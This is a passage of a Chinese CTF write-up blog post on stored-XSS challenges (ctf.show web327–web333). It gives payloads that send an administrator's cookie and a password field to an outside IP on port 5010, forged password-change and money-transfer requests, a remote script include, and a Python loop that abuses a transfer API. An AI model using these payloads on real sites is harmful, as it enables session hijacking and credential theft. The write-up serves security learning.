ascii_str <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"请输入以逗号分隔的ASCII码字符串: "</span><span class="token punctuation">)</span>

<span class="token comment"># 调用函数进行转换并打印结果</span>
string_result <span class="token operator">=</span> ascii_to_string<span class="token punctuation">(</span>ascii_str<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"转换后的字符串:"</span><span class="token punctuation">,</span> string_result<span class="token punctuation">)</span>

</code></pre>

<h4 id="web327-存储型xss"><a href="#web327-存储型xss" class="headerlink" title="web327(存储型xss)"></a>web327(存储型xss)</h4><p>虽然但是，还是之前的payload，收件人必须是admin</p>
<h4 id="web328-伪造Cookie"><a href="#web328-伪造Cookie" class="headerlink" title="web328(伪造Cookie)"></a>web328(伪造Cookie)</h4><p>先提前监听5010端口，然后在注册用户的时候注入payload，反弹管理员的cookie</p>
<pre class="language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script"><span class="token language-javascript">window<span class="token punctuation">.</span><span class="token function">open</span><span class="token punctuation">(</span><span class="token string">'http://117.72.70.186:5010/'</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token punctuation">)</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></code></pre>

<p>这样得到admin的cookie进行伪造查看用户即可得到flag</p>
<h4 id="web329"><a href="#web329" class="headerlink" title="web329"></a>web329</h4><p>和上题不同的是，Cookie会立刻失效。不能通过窃取Cookie的形式得到flag了。</p>
<p>我们分析一下原理，我们的payload作为储存型XSS，管理员访问时候能被我们窃取Cookie，那是不是还能窃取点别的东西呢，比如说管理员看到的用户名和密码。理论上来说是可以的，所以就直接获取管理员的页面信息。</p>
<p>我们可以通过类名查找元素，通过document来获取。</p>
<p>现在服务器上面监听端口5010。</p>
<p>innerHTML和outerHTML的区别</p>
<blockquote>
<p>1、innerHTML:<br>　　从对象的起始位置到终止位置的全部内容,不包括Html标签。<br>innerText可替代innerHTML</p>
<p>2、outerHTML:<br>　　除了包含innerHTML的全部内容外, 还包含对象标签本身。</p>
</blockquote>
<p><img src="web329.png" alt="img" loading="lazy"></p>
<p>可以看到前端代码中将要显示admin密码的地方类为<code>layui-table-cell laytable-cell-1-0-1</code></p>
<p>payload： </p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>window<span class="token punctuation">.</span><span class="token function">open</span><span class="token punctuation">(</span><span class="token string">'http://117.72.70.186:5010/'</span><span class="token operator">+</span>document<span class="token punctuation">.</span><span class="token function">getElementsByClassName</span><span class="token punctuation">(</span><span class="token string">'layui-table-cell laytable-cell-1-0-1'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>innerHTML<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p>解释一下它的每一部分：</p>
<blockquote>
<p><code>window.open(&#39;http://117.72.70.186:5010/&#39;+document.getElementsByClassName(&#39;layui-table-cell laytable-cell-1-0-1&#39;)[1].innerHTML)</code>这是一个调用 window.open() 函数的语句，用于打开新的浏览器窗口。<br><code>&#39;http://117.72.70.186:5010/&#39;</code> 这是一个字符串，表示要打开的网页的 URL。它包括了协议（http:&#x2F;&#x2F;）、主机名（120.46.41.173）和端口号（9023），以及路径（后面的斜杠 &#x2F;）。<br><code>document.getElementsByClassName(&#39;layui-table-cell laytable-cell-1-0-1&#39;)[1].innerHTML</code> 这是一系列 DOM 操作，用于获取网页中特定元素的内容。<br><code>document.getElementsByClassName(&#39;layui-table-cell laytable-cell-1-0-1&#39;)</code> 是一个通过类名查找元素的方法。它查找具有类名 <code>&#39;layui-table-cell&#39;</code> 和 <code>&#39;laytable-cell-1-0-1&#39;</code> 的元素，通常这是一种针对表格单元格的选择。<br><code>[1]</code> 表示从匹配的元素列表中选择第二个元素（JavaScript 中的数组索引从 0 开始）。<br><code>.innerHTML</code> 用于获取选定元素的 HTML 内容，也就是在这个表格单元格中显示的文本或 HTML。</p>
</blockquote>
<p><img src="web329_2.png" loading="lazy"></p>
<h4 id="web330"><a href="#web330" class="headerlink" title="web330"></a>web330</h4><p>多了一个修改密码，可以看到调用了<code>api/change.php</code>参数p则是我们修改的密码</p>
<p><img src="web330.png" loading="lazy"></p>
<p>我们可以伪造admin的cookie来去修改密码，但cookie是暂时的，所以利用xss主动去改</p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>window<span class="token punctuation">.</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">'http://127.0.0.1/api/change.php?p=111'</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p>然后登录admin就可以了</p>
<h4 id="web331"><a href="#web331" class="headerlink" title="web331"></a>web331</h4><p>和上题类似，我们先抓包分析。这次修改密码变成了POST请求。</p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>$<span class="token punctuation">.</span><span class="token function">ajax</span><span class="token punctuation">(</span><span class="token punctuation">&#123;</span><span class="token literal-property property">url</span><span class="token operator">:</span><span class="token string">"api/change.php"</span><span class="token punctuation">,</span><span class="token literal-property property">method</span><span class="token operator">:</span><span class="token string">"POST"</span><span class="token punctuation">,</span><span class="token literal-property property">data</span><span class="token operator">:</span><span class="token punctuation">&#123;</span><span class="token string-property property">'p'</span><span class="token operator">:</span><span class="token string">'111'</span><span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<h4 id="web332"><a href="#web332" class="headerlink" title="web332"></a>web332</h4><p>这次多了可以转账的功能</p>
<p>说是可以向别人转负数，但是我这儿就是有内鬼，停止交易😅</p>
<p>所以利用xss</p>
<blockquote>
<p>jquery的这个ajax不能携带cookie请求，所以有点麻烦，但是如果是本地请求就刚好绕过了这一点</p>
</blockquote>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript">$<span class="token punctuation">.</span><span class="token function">ajax</span><span class="token punctuation">(</span><span class="token punctuation">&#123;</span>
	<span class="token literal-property property">url</span><span class="token operator">:</span> <span class="token string">"http://127.0.0.1/api/amount.php"</span><span class="token punctuation">,</span>
	<span class="token literal-property property">method</span><span class="token operator">:</span> <span class="token string">"POST"</span><span class="token punctuation">,</span>
	<span class="token literal-property property">data</span><span class="token operator">:</span><span class="token punctuation">&#123;</span>
		<span class="token string-property property">'u'</span><span class="token operator">:</span><span class="token string">'test'</span><span class="token punctuation">,</span>
		<span class="token string-property property">'a'</span><span class="token operator">:</span><span class="token number">10000</span>
		<span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
		<span class="token literal-property property">cache</span><span class="token operator">:</span> <span class="token boolean">false</span><span class="token punctuation">,</span>
		<span class="token function-variable function">success</span><span class="token operator">:</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">res</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre>

<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script src<span class="token operator">=</span><span class="token string">"http://117.72.70.186/xs5/post.js"</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p>在注册界面填入payload</p>
<p>然后找个test账号收钱</p>
<h4 id="web333"><a href="#web333" class="headerlink" title="web333"></a>web333</h4><p>332的方法照样可以</p>
<p>也可以转账给自己，而且得保证自己最低有1块钱，写个脚本</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> re
<span class="token keyword">import</span> time
x<span class="token operator">=</span><span class="token number">5</span>
url<span class="token operator">=</span><span class="token string">"http://f6d9355e-3521-4f14-b1f7-c6bbe137790d.challenge.ctf.show/api/amount.php"</span>
url2<span class="token operator">=</span><span class="token string">"http://f6d9355e-3521-4f14-b1f7-c6bbe137790d.challenge.ctf.show/api/getFlag.php"</span>
headers<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token string">'Cookie'</span><span class="token punctuation">:</span><span class="token string">'PHPSESSID=3o54ih5njfm1hh1ccnet28e59b'</span><span class="token punctuation">&#125;</span>  <span class="token comment">#自己登录后的sessionid</span>
<span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>x<span class="token punctuation">)</span>
    t<span class="token operator">=</span>x<span class="token operator">-</span><span class="token number">1</span>
    data<span class="token operator">=</span><span class="token punctuation">&#123;</span>
    <span class="token string">'u'</span><span class="token punctuation">:</span><span class="token string">'hsad'</span><span class="token punctuation">,</span> <span class="token comment">#注册的用户名</span>
    <span class="token string">'a'</span><span class="token punctuation">:</span><span class="token builtin">str</span><span class="token punctuation">(</span>t<span class="token punctuation">)</span>
    <span class="token punctuation">&#125;</span>
    r<span class="token operator">=</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span>headers<span class="token operator">=</span>headers<span class="token punctuation">,</span>data<span class="token operator">=</span>data<span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>r<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span>x<span class="token operator">></span><span class="token number">10000</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        r2<span class="token operator">=</span>requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url2<span class="token punctuation">,</span>headers<span class="token operator">=</span>headers<span class="token punctuation">)</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span>r2<span class="token punctuation">.</span>text<span class="token punctuation">)</span>
        <span class="token keyword">break</span>
    x<span class="token operator">+=</span>t

</code></pre>

</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">I'm so cute. Please give me money.</div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Hsad</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/" title="web入门-xss">https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2024/07/24/Ubuntu18.04%E4%B8%8Anginx+php%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" rel="prev" title="Ubuntu18.04上nginx+php环境搭建"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">Ubuntu18.04上nginx+php环境搭建</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2024/07/18/web%E5%85%A5%E9%97%A8-Java/" rel="next" title="web入门-Java"><span class="post-nav-text">web入门-Java</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2024 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Hsad</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.2.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>